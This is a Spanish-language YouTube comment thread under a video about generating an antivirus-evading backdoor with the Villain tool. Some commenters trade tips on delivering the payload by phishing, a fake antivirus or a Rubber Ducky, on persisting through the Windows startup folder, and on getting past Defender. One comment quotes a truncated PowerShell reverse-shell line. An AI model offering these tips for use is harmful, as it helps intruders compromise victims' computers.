👉 VILLAIN | Generar una BACKDOOR INDETECTABLE para el ANTIVIRUS | Así de FÁCIL TE HACKEAN 🔴

Поділитися
Вставка
  • Опубліковано 25 жов 2024

КОМЕНТАРІ • 156

  • @ElPinguinoDeMario
    @ElPinguinoDeMario  5 місяців тому

    🚀 Aprende ciberseguridad y hacking ético desde cero con nuestra academia El Rincón del Hacker!! elrincondelhacker.es
    🎓 Curso Preparación eJPT: elrincondelhacker.es/courses/preparacion-certificacion-ejptv2/
    🎓 Curso de Linux y Bash Scripting: elrincondelhacker.es/courses/curso-de-linux-y-bash-scripting/
    🎓 Curso de Docker: elrincondelhacker.es/courses/curso-de-docker/
    Hosting que recomiendo: raiolanetworks.com/landing/hosting-elpinguinodemario/

  • @elliotowasp4077
    @elliotowasp4077 24 дні тому

    Siempre subes cosas súper interesantes y útiles! Eres muy muy bueno!

  • @javibelenguer
    @javibelenguer Рік тому +5

    Eres un crack y de los buenos, esa shell te deja hacer keylogger en la máquina víctima, piensa algo de keylogger por mail o ngrok. Recomiendo Saint. Gracias

  • @andricordobamoo1690
    @andricordobamoo1690 Рік тому +11

    Me preguntó si algunas bases de datos de antivirus ya están actualizadas para este tipo de payloads, ya había investigado algo sobre la herramienta pero no la había visto en acción, excelente información Mario

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +2

      Sería cuestión de investigar, aunque pocos antivirus creo que estén actualizados para esto de momento, es cuestión de esperar hasta que se actualicen

    • @AnimashDaje
      @AnimashDaje Рік тому +3

      @@ElPinguinoDeMario ya esta ree parcheado xd

    • @gustavomanyoma2557
      @gustavomanyoma2557 Рік тому +1

      Siii?

  • @cybersecuritysam
    @cybersecuritysam Рік тому +3

    Excelente video, es una herramienta bastante interesante!....

  • @clinicaabril
    @clinicaabril Рік тому +3

    Gracias Master por estas clases tan interesantes....

  • @tonymantruck8511
    @tonymantruck8511 Рік тому +1

    Excelente video muy pronto lo pondré a prueba

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +1

      Muchas gracias!! Ahora el defender ya se actualizo, pero quitando eso sigue funcionando 😁

  • @zebus3d
    @zebus3d Рік тому +9

    ¿Y si por algún casual te lo hicieran?, Con algún sniffer se podría detectar esa conexión remota?, Estaría bien aprender más a interpretar lo que sale en los sniffers para detectar este tipo de ataques. ¿No existen herramientas que usen en realtime algún sniffer para hacer detecciones de anomalías en tu red al vuelo?. Un saludo y felicidades por el canal!

    • @victorchoquehuanca2306
      @victorchoquehuanca2306 5 місяців тому

      yo creo que podrias hacerlo, con wireshark, pero es una herramienta muy general y tendrian que tener conocimientos en redes para poder detectar, no se si habran herramientas mas automatizadas

  • @hectorrewardd2737
    @hectorrewardd2737 Рік тому +1

    Este canal vale oro!

  • @raonpe
    @raonpe Рік тому +18

    Herramientas como éstas hay a patadas y a las pocas semanas de publicarse, sus firmas de detección (hashes, fuzzy hashes, reglas yara, etc) son publicadas y son detectadas enseguida. Así es la historia de las herramientas de evasión ;) Afortunadamente los fabricante de antimalware (incluyendo Microsoft con Defender) hacen los deberes aunque cada vez lo tienen más difícil. Por eso las soluciones tradicionales basadas en firmas no sirven en organizaciones objetivo de ataques: tienen que usar EDR, XDR, NDR, etc y todo este tipo de soluciones que además analizan comportamiento, utilizan IA, fuentes de inteligencia, análisis de sandbox en la nube, etc porque no es suficiente con las firmas. Saludos

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +9

      Exacto!! Por eso esta genial mostrar la existencia de estas herramientas para concienciarnos de lo fácil que es que lleguemos a ser hackeados 😁💪🏻

  • @fabriciozetaquiroga7912
    @fabriciozetaquiroga7912 3 місяці тому +1

    seria bueno que lo pruebes en una pc de alguna persona que este lejos porque para eso es otro metodo que explica en el video del creador de villain

  • @paltwitch6431
    @paltwitch6431 Рік тому +4

    Buenas Mario, me encantan tus vídeos. Quisiera hacerte una pregunta, cómo consigues actualizarte en este tema, por ejemplo como te has enterado de que ha salido este payload o que por ejemplo lo han actualizado. Gracias y sigue así que me tienes enganchado a tus vídeos.

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +5

      Muchísimas gracias por el apoyo!!! Se agradece un montón jeje en cuanto a la pregunta, en el ejemplo de este vídeo me enteré gracias a un seguidor que me lo dijo en el grupo de Telegram, pero en general no hago nada en especial para mantenerme actualizado, simplemente trato de aprender algo nuevo cada día y de esa forma me mantengo actualizado y mejoro constantemente 💪🏻💪🏻

  • @erwingodoy9511
    @erwingodoy9511 Рік тому +1

    Siempre es más recomendable diseñar un código propio en Python para hacer esto. Gracias mario

    • @carlosastete4290
      @carlosastete4290 Рік тому

      actualmente no funciona el metodo :(

    • @ciroenrique5285
      @ciroenrique5285 Рік тому

      Hice un malware en python pero no se como evitar el windows defender@@carlosastete4290

  • @vicentesalinas6666
    @vicentesalinas6666 Місяць тому

    Una pregunta, ¿cabe la posibilidad de que no detecte por ser una ip (la del "atacante"), en la misma red de casa? (no entiendo mucho, ni soy fan de windows, pero me ha dado que pensar). Gracias.

  • @club.reto.urbano
    @club.reto.urbano 11 місяців тому

    amigo cómo estas excelente video, instale vitual box y luego kali linx en virtual box, no entiendo porque no logro ver la barra de tareas. que puedo hacer, gracias de antemano

  • @javaboy6581
    @javaboy6581 Рік тому

    Muy bueno pinguino, hay muchas herramientas asi y es sencillo de crear estos rats, lo suyo seria que viniesen con 0 days para escalar privilegios xD

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Exacto! Aunque ya con el simple hecho de poder acceder a una máquina de forma tan fácil es increíble 😱

  • @huangfuhaoyue626
    @huangfuhaoyue626 Рік тому +3

    Nada mas empezar el video se me encogio el qlo.

  • @gerardopacheco9521
    @gerardopacheco9521 Рік тому

    muchas gracias!!!

  • @visionawka1528
    @visionawka1528 Рік тому

    Gracias gran aporte

  • @kelvinrodriguez4569
    @kelvinrodriguez4569 11 місяців тому

    saludos mi amigo---- pero ya el antivirus defender lo bloquea.... tengo windows 10 actualizado ... fecha de la penetracion 26/11/2023

  • @silofiilofli4543
    @silofiilofli4543 Рік тому +1

    buen vídeo!!! esta herramienta funciona para Android ??🤔🤔🤔 para móvil? si no funciona estaría bien alguna como esta para móviles gracias!!🎅🎅💪💪👍

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Hola! En este caso para móvil no funcionaría ya que está hecha para atacar Linux o Windows , para Android hay un módulo de msfvenom que nos permite crear una apk infectada y ganar acceso remoto a Android 👍🏻

  • @rrg7289
    @rrg7289 Рік тому +1

    Qué facil es que nos puedan hackear!, Hay que tener cuidado con lo que recibimos por correo, por whatsapp web, o cualquier medio. Una pregunta El Pinguino de Mario, este payload se puede esconder en cualquier archivo, ya que si vemos un comando con mucho texto "raro", optariamos por no hacer nada y borrarlo, pero supongo que gente malintencionada podria esconder todo ese codigo en algun fichero. Como se podria hacer eso, digo para fines educativos. ya que en otro de tus videos se pudo esconder otro payload en un PDF. Y por ultimo, ningun antivirus es capaz de detectarlo? Tambien funciona en Celulares?. Un saludos y contenido muy interesante y educativo.

    • @EstebanInojosa-jz7eu
      @EstebanInojosa-jz7eu 4 місяці тому

      Haces un bat luego lo escondes como viste en el caso del PDF

  • @Martin_RGB
    @Martin_RGB 3 місяці тому +1

    debe estar en la misma red no?

  • @Nexo-b7k
    @Nexo-b7k Місяць тому

    Hola, queria preguntaros ¿Te pueden hackear con eso o algo parecido sin descargarse nada? Y tener acceso remoto?

  • @drgold1239
    @drgold1239 Рік тому

    okay pero para para que funcione se la persona tiene que ejecutarlo en su terminal ?

  • @cesarramos4065
    @cesarramos4065 Місяць тому

    Lo que da temor de estas herramientas ya creadas es que si ya tienen potencial en su labor, imagina si al creador le da por hacer el hack a través de su herramienta para la gente que la descargue e utilice, yo al menos hasta que no vea como funciona ese .py no lo ejecutaría. No quito ningún mérito pero me gusta tener mil ojos.

    • @mrelizeus2261
      @mrelizeus2261 27 днів тому

      Quién metería datos importantes en una máquina virtual de kali? xD

    • @fran7390
      @fran7390 25 днів тому

      Había oído que algunos en la Ciberseguridad se volvían paranoicos, pero no lo creía...

  • @lucasmanuel7807
    @lucasmanuel7807 11 місяців тому

    En el minuto 1:24 se puede observar como se le salen los colmillos a Mario

  • @raulgabrielhacho9231
    @raulgabrielhacho9231 Рік тому

    en caso mio no funciona por mas que desactivo los antivirus. me vota el mensaje acceso denegado.. aun asi si lo ejecuto en una cmd como administrador

  • @pitagoricofenixzone5508
    @pitagoricofenixzone5508 Рік тому

    Amigo de dónde mantienes actualizado de toda esta información? sirve para equipos fuera del lan?

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +1

      Hola!! Es difícil mantenerse siempre 100% actualizado, pero la clave es aprender a entender el funcionamiento del Hacking y todo lo que ello conlleva, y así es muy fácil actualizarse con lo que vayas necesitando 👍🏻

  • @ChapuBrah
    @ChapuBrah Рік тому +2

    Bro hay alguna manera de meterle ese comando, y ajuntarlo con un programa .exe? Para que cuando lo descarguen y lo instalen te bote le shell?

  • @Elcrack158
    @Elcrack158 9 місяців тому

    hola bro quisiera hacerte una pregunta, y si genero ese codigo lo guardo y apago mi pc y la vuelvo a encender y pongo ese codigo en una maquina windows, como vuelvo a donde estaba antes en kali linux

    • @Cornieles_16
      @Cornieles_16 8 місяців тому

      Si lo creas en una Máquina Virtual puedes suspenderla

  • @rap.underground
    @rap.underground 9 місяців тому

    pero solo el antivirus de windows no detecta eso o tambien ningun otro antivirus??

  • @gerardopacheco9521
    @gerardopacheco9521 Рік тому

    hola algun curso de linux que recomiendes?? saludos

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +1

      Hola!! Te recomiendo instalar Linux en tu ordenador e ir aprendiendo día a día, como instalar programas, eliminar, comandos, etc 👍🏻

  • @carlosherraizjover4482
    @carlosherraizjover4482 9 днів тому

    sale acceso denegado en la maquina windows

  • @rabeeh7882
    @rabeeh7882 Рік тому

    ya esta capado, podria haber otro backdoor indetectable?

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Lo han capado efectivamente, habría que mirar nuevas herramientas, de todos modos esta es muy útil para Windows desactualizados 🤷🏻‍♂️

  • @juanpcely1417
    @juanpcely1417 Рік тому +1

    ya no funciona lo detecta como script malicioso al momento de ingresar el payload :(

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Sii exacto, con el tiempo lo han corregido aunque puede seguir siendo útil para equipos desactualizados 👍🏻

  • @blacksaturn3839
    @blacksaturn3839 10 місяців тому +1

    Lo han parchao, ahora si lo detecta :(

  • @EnriqueMartinez-ul5uk
    @EnriqueMartinez-ul5uk Рік тому

    Me apareció un mensaje en la consola que dice " Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus", que solución tendría eso?

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +1

      Hola!! el Windows defender se actualizo y a día de hoy ya no es vulnerable 🤷🏻‍♂️

  • @marlonisraelacostaporras3611

    EXCELENTE VÍDEO SALUDOS DESDE ECUADOR , como le harías para camuflar ese código y que la victima lo ejecute _

  • @edgarhernanmaidana7141
    @edgarhernanmaidana7141 4 місяці тому

    hola mario. al ahora de ejecutar python3 Villain.py me sale una cantidad de cosas a lo ultimo dice ModuleNotFoundError: No module named 'netifaces' .. sabes que puede ser?

  • @diegoalejandroh6139
    @diegoalejandroh6139 8 місяців тому

    consulta, tiene persistencia? osea se guardan las victimas al momento de realizar esto, recuerdo que ocupaba turkojan y cada vez que reinicaban el pc me volvian a aparecer las victimas en una fila con su ip gracias.

    • @ΨΜΒ
      @ΨΜΒ 4 місяці тому

      tiene?

  • @samuelroman4514
    @samuelroman4514 Рік тому

    Quiero hacer un pentest para mis celulares iOS y android. Puedes hacer un tutorial de eso ? Es lo que me falta por aprender. Quiero decir tener acceso remoto ver archivos ect

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +1

      Hola!! En mi caso tengo muy pocos conocimientos de hacking en teléfonos 🤷🏻‍♂️

    • @samuelroman4514
      @samuelroman4514 Рік тому

      @@ElPinguinoDeMario entendido Gracias de todos modos
      Para mi usted sabe muchísimo 🙏🏿

  • @gustavopalacios4713
    @gustavopalacios4713 27 днів тому

    Me dice:
    Required argument PAYLOAD not supplied.

    • @marraqueta8399
      @marraqueta8399 25 днів тому

      hace connect tu direccion ip del kali 6501

    • @oscardelarosamacedo2830
      @oscardelarosamacedo2830 День тому

      ​@@marraqueta8399le puse connect 192.... 6501
      Y me dice acción denegada
      Qué procede?

  • @ZenaNoob69
    @ZenaNoob69 Рік тому

    Una pregunta, ¿Esto es fuera de la lan? Gracias.

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Hola!! En el vídeo es dentro de la lan, aunque podría funcionar fuera también 👍🏻

  • @Learningtoplayguitartogether
    @Learningtoplayguitartogether 11 місяців тому

    mi pregunta sería, si alguien accede a tu pc, como se podría liberar uno de esto? Me lo han hecho y no se como actuar, con pasar en modo seguro algun anti malware y formatear es suficiente?

    • @ImSkiiLzz
      @ImSkiiLzz 4 місяці тому

      Me paso, lo pudiste solucionar amigo?

  • @mgamer-vm9xc
    @mgamer-vm9xc Рік тому

    si cierran la powershell se apaga la shellreversa o se mantiene para siempre

  • @gabrielaranda2238
    @gabrielaranda2238 Рік тому

    como son los comandos para poder descargar los archivos?

  • @sergioramos-gv9ob
    @sergioramos-gv9ob Рік тому

    También se puede aplicar en Ubuntu o solo es para kali?

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Hola!! En este caso se aplica para cualquier sistema Linux 👍🏻

  • @L-God369
    @L-God369 11 місяців тому

    pero ese peiloc se puede hacer auto ejectutable

  • @chris351
    @chris351 Рік тому

    Tengo tinywall y solo le doy permisos de salida a navegador y 5 programas el resto lo bloqueo todo, igual me puede hackear con esa herramienta?

    • @virtual-riot
      @virtual-riot 11 місяців тому

      Muy bueno, y respecto a tu pregunta ovbiamenre ya no podrian ya que estas aplicando basicamente lo que es zero trust en terminos de ciberseguridad (filtros de firewall) muy bueno el uso de tiny wall me sorprende asi deberian ser todos pero tendrias que tener conocimiento, yo uso otro aplicativo que funciona como lista negra y blanca y gris y asi nos aseguramos mejor, solo que para que el sistema llegue a funcionar bien como cualquier otro tenes que dar el correcto permisos a distinto servicios, (y) saludos

  • @williamspsocik5051
    @williamspsocik5051 Рік тому

    A mi me funcionaba la volvi a probar y no hace nada jajajajaja.

  • @diegootaku8281
    @diegootaku8281 Рік тому

    Ya lo detecta el antivirus, buenas tardes

  • @Orco256
    @Orco256 4 місяці тому +1

    no entiendo que sentido tiene esto si no nos va a decir como protegernos. despues de todo el usuario victima tiene que ejecutar tu codigo generado en una terminal, asique la manera mas segura de protegerse es no andar en cosas raras. cualquier programa de tercero no firmado podria ejecutarte ese codigo y convertirte en victima. gracias a cosas como estas toda la gente optara por pagar en microsoft store por sus programas y juegos en steam o epic games. fuentes oficiales. se termina la livertad para usuarios de escritorio

  • @bronthebeats5673
    @bronthebeats5673 Рік тому

    funciona fuera de la red local?

  • @gabrielacosta02
    @gabrielacosta02 6 місяців тому

    No funciona con kali Ubuntu

  • @onedayapp3534
    @onedayapp3534 Рік тому

    es solo en local?

  • @maycolsosaruiz4887
    @maycolsosaruiz4887 6 місяців тому

    4:05 ayuda me aparece "required argument payload not supplied" que hago :(

  • @chupete1011
    @chupete1011 Рік тому

    Estaba pensando que ejecutando esto desde un USB tipo Ruber Ducky o Bad USB, lias la de Dios, por ejemplo un ordenador del trabajo, un banco al que se lo puedas conectar con ingeniería social, u otros ejemplos..... aunque sería más peligroso con un rat, que con un simple payload.

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Exacto!! Por eso esta bien mostrarlo porque son herramientas con mucho potencial y tenemos que tener cuidado 🤷🏻‍♂️

    • @chupete1011
      @chupete1011 Рік тому

      Mario, venga te expongo un reto y a ver si tienes web0s de hacer un vídeo 😉
      Déjate de tanto Kali Linux que parece que no hay otra cosa.
      Y haz un vídeo hackeando un Windows desde otro Windows sin que te lo detecte ningún antivirus.
      Venga, que es súper fácil.
      Desde dentro de la red o fuera de la red con ngrok que sabes que es sencillo. Cómo quieras, pero sin usar el clásico netcat que te lo detecta cualquier antivirus a la más mínima.
      Venga y así muestras tus dotes de obfuscador.

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +1

      @@chupete1011 jaja es un buen reto, diría de hacerlo todo con Python, por ejemplo tengo este vídeo que más o menos lo consigo:
      🔴 HACKING ÉTICO - Cómo Obtener REVERSE SHELL con PYTHON | INDETECTABLE por el ANTIVIRUS 🐍
      ua-cam.com/video/VT7Mwe8c6Ec/v-deo.html
      Aunque estoy preparando más vídeos con la librería pwntools de Python para hacer más Hacking ético con Python y eso se puede lanzar desde Windows 😁

    • @chupete1011
      @chupete1011 Рік тому +1

      Bueno usa Python para hacer un script que codifique un troyano por ejemplo y luego lo lanzas desde un bat con comandos de powershell y es bastante efectivo.
      Y en el vídeo que dices usas Python pero no sólo en la vida todo es Python, aunque con Python puedes crear el payload, el obfuscador, y luego ya solo es generar el bat para ejecutarlo desde powershell.

    • @marlonisraelacostaporras3611
      @marlonisraelacostaporras3611 Рік тому

      que método usarias para ejecutar esto desde una rubber ducky ?

  • @rk5.denvali
    @rk5.denvali 2 місяці тому

    ya lo detecta gente

  • @elhombrenegro1129
    @elhombrenegro1129 Рік тому

    Como creo una persistencia con ese backdoor que subiste?

    • @AnimashDaje
      @AnimashDaje Рік тому

      bro si lo encuentras comparte porfa

    • @EstebanInojosa-jz7eu
      @EstebanInojosa-jz7eu 4 місяці тому +1

      ​@@AnimashDaje en windows existe un directorio que todo lo que allí agregues se ejecuta en cada inicio. Tecla Windows + R : shell:startup
      Si logras colarte una vez, llega hasta el directorio que te indique y planta allí el payload así puedes ganar acceso en el próximo reinicio (solo tendrías que estar sniffeando constantemente para lograr el acceso) lo he probado con otros métodos de shell reverse y funciona

  • @Elnoobdelinux
    @Elnoobdelinux Рік тому

    Bro has un videos de backdoor fuera de la lan

  • @lunaticklunaticklunatick
    @lunaticklunaticklunatick Рік тому

    funciona para android ?

  • @bambam56
    @bambam56 Рік тому

    para fuera de internet hay que poner ip publica no?

    • @Orco256
      @Orco256 4 місяці тому

      no se entiende tu pregunta. lo que es fuera de internet es local. tu ip publica es visible por otros de pende a donde te conectes si te conectas a youtube, este vera tu ip publica pero si tenes un servidor de lo que sea, cuando se conecten a vos, veras sus ip publica. fuera de internet osea la local te la da tu router y la publica te la da tu proovedor de internet. incluso a veces no tenes la posibilidad de cambiar tu ip publica. asique la publica es de internet y la privada es la local.

  • @Alfonso-Rivera-Quispe
    @Alfonso-Rivera-Quispe Рік тому

    Estos triste, ya no funciona, tenia proyectos con esta herramienta 🙁🙁

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Fue bonito mientras duro, aunque quizá actualizan la herramienta 🤷🏻‍♂️

  • @lucascaskajillo540
    @lucascaskajillo540 Рік тому +2

    Vaya miedo, madre mía

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      La verdad que si!! Pero esta bien conocer este tipo de riesgos para protegernos 👍🏻

  • @greatplayer2221
    @greatplayer2221 2 місяці тому

    jeje mi antivirus si lo detectó

  • @LilithRodríguez-o7i
    @LilithRodríguez-o7i 2 місяці тому

    SI FINES ETICOS :V

  • @martabermudez2189
    @martabermudez2189 Рік тому

    😊

  • @onsitesalzitahx
    @onsitesalzitahx Рік тому

    Justo hoy instale un juego por mediafire y justo un segundo después de que descomprimí el juego me salto una notificación de dos troyanos, uno que se llamaba “Backdoor” y el otro que se llama “Bladabindi”, si fuera verdad que ese archivo .rar tenía esos dos troyanos ps me jodí, me gustaría saber como des hacerme de ellos, aunque en este PC no tengo nada importante que puedan hackear

    • @gatras1540
      @gatras1540 Рік тому +2

      pueden mirar tus camaras, tu microfono, eliminar y poner archivos en tu computador y aparte pueden hacer ataques con tu pc y dejandolo como si fueras tu

    • @onsitesalzitahx
      @onsitesalzitahx Рік тому

      @@gatras1540 diablo loco, wazaaa👻👻👻, ok ya hablando en serio, what, y no hay forma de zafarse de eso?

    • @mauriciopinto2669
      @mauriciopinto2669 Рік тому +1

      @@onsitesalzitahx formatear el pc y aprender la lección, "Lo gratis sale caro después" .

    • @onsitesalzitahx
      @onsitesalzitahx Рік тому

      @@mauriciopinto2669 Noooo KAJAJSJAKJA que vrg, bueno, igual gracias

    • @gatras1540
      @gatras1540 Рік тому +1

      @@onsitesalzitahx es verdad lo que dice mauricio, si no lo haces y si es un ataque o un profesional, lo puede hacer sin que te des de cuenta y extorsionarte, es mejor que la formatees si no lo haces corre tu el riesgo...

  • @__Oldboy__
    @__Oldboy__ Рік тому

    Y luego como podrias acceder desde una red externa?, porque seguramente has hecho esta demostracion en dos SO pero que estan conectados a tu misma red. Como harías para ejecutar esa revershell desde una red externa?, por ejemplo, estando tu conectado desde casa y el otro dispositivo estuviera en una bibilioteca?..

    • @AnimashDaje
      @AnimashDaje Рік тому +1

      eso ya nos toca a nosotro 👌

  • @blancaestelaromeromuñiz
    @blancaestelaromeromuñiz Рік тому

    Prefiero la ofuscacion manual

  • @comentator6489
    @comentator6489 Рік тому

    ya lo parcharon ;(

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +1

      Sii exacto, aunque sigue siendo una herramienta útil 💪🏻

  • @kendalldg7632
    @kendalldg7632 Рік тому

    Lo intente hoy 24 julio de 2023 desde mi maquina virtual Linux a una laptop con Windows 11 Home y Powershell bloquea el comando con el siguiente mensaje: En línea: 1 Carácter: 1
    + Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Obj ...
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Este script contiene elementos malintencionados y ha sido bloqueado por el software antivirus.
    + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

    • @kendalldg7632
      @kendalldg7632 Рік тому

      Alguien sabe como ocultarlo para que el Antivirus No lo detecte? o algún foro de hacking ético que me recomeinden para solucionar este tipo de dudas?

    • @AnimashDaje
      @AnimashDaje Рік тому

      ya fue parcheado@@kendalldg7632

  • @danielvazquezromero4691
    @danielvazquezromero4691 Рік тому

    Ya no funciona

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Exacto, ya fue parcheado, aunque aún así es muy útil para poder utilizarlo en versiones desactualizadas 👍🏻

  • @fpsllordd4rk921
    @fpsllordd4rk921 Рік тому

    Que bueno saberlo para tratar de erradicar esa payload, ahora creo que si se hace un bat y se manda vía correo a víctima se crea conexión. Pero no modo persistente

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому

      Exacto!! La verdad que es un peligro, veremos si lo parchean y se actualiza el defender, para este tipo de métodos suelen funcionar un tiempo hasta que se actualiza el sistema

    • @lucascaskajillo540
      @lucascaskajillo540 Рік тому +2

      Se puede hacer, y además si lo cifras y lo pones en tipo ejecutable y lo copias a la carpeta de inicio entonces si que es persistente

    • @fpsllordd4rk921
      @fpsllordd4rk921 Рік тому

      @@lucascaskajillo540 claro quedar en segundo plano, estoy consciente en eso enmascarer el código malicioso, con un técnica de ingeniería social o phishin,

    • @lucascaskajillo540
      @lucascaskajillo540 Рік тому +2

      @@fpsllordd4rk921 Exactamente, lo ocultas en un programa, o peor aún en un Antivirus, y ahí tienes el protector Antivirus y el Payload indetectable de antivirus usando la técnica del Phising

    • @fpsllordd4rk921
      @fpsllordd4rk921 Рік тому

      @@lucascaskajillo540 tecnica de evacion de firewall, antivirus con esta herramienta

  • @Alvark123
    @Alvark123 8 місяців тому

    Los de Microsoft ya lo habrán parcheado

  • @Goetia205
    @Goetia205 Рік тому

    Parcheado

  • @danielrodriguez5960
    @danielrodriguez5960 Рік тому

    Esta re detectado

    • @ElPinguinoDeMario
      @ElPinguinoDeMario  Рік тому +1

      Sii solo fue válido durante unos días 🤷🏻‍♂️

  • @dzpazor0
    @dzpazor0 10 місяців тому

    te doxeaste?